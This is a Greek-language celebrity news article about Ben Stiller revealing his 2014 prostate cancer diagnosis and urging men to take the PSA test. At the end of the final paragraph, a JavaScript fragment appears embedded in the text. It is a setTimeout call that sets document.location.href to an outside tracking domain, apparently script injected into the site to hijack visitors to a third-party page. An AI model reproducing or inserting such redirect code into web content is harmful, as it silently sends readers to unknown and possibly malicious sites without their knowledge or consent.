Η μάχη του διάσημου ηθοποιού με τον καρκίνο – Τι εξομολογείται

0
7

 

Ο Μπεν Στίλερ προχώρησε σε μία προσωπική αποκάλυψη ότι είχε διαγνωστεί με καρκίνο του προστάτη τον Ιούνιο του 2014 και ότι υποβλήθηκε «κρυφά» σε χειρουργική επέμβαση.

Ο διάσημος και ιδιαίτερα αγαπητός κωμικός σε συνέντευξή του εκμηστηρεύτηκε ότι αισθάνθηκε πολύ φοβισμένος και οτι ξαφνικά σταμάτησαν τα πάντα στη ζωή του! «Ήρθε από το πουθενά για μένα», είπε χαρακτηριστικά.

Ο Μπεν Στίλερ προχώρησε στην συγκεκριμένη αποκάλυψη προκειμένου να ευαισθητοποιήσει τους άντρες να κάνουν την εξέταση PSA. Στον προσωπικό του λογαριασμό στο Twitter έγραψε: «Λοιπόν, είχα καρκίνο μερικά χρόνια πριν και θα ήθελα να μιλήσω γι ‘αυτό. Και η εξέταση PSA μου έσωσε τη ζωή μου ».

On Tuesday morning, Stiller took to Twitter to share a blog post opening up about his ordeal and urging people to get tested earlier
Ο διάσημος ηθοποιός στάθηκε τυχερός γιατί διαγνώστηκε έγκαιρα η ασθένειά του και ο ίδιος σημειώνει γι’αυτό: «Αν [ο γιατρός μου] περίμενε, όπως συστήνει η Αμερικανική Αντικαρκινική Εταιρεία, έως ότου ήμουν 50, – για να κάνω την PSA  – δεν θα γνώριζα ότι είχα έναν επιθετικό όγκο«. Σημειώνεται ότι όταν έγινε η διάγνωση ο Μπέν Στίλερ ήταν 48 ετών.

«Αν είχα ακολουθήσει τις κατευθυντήριες γραμμές σήμερα θα ήταν πολύ αργά για να θεραπεύσω με επιτυχία τον καρκίνο», εξομολογείται ο ίδιος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here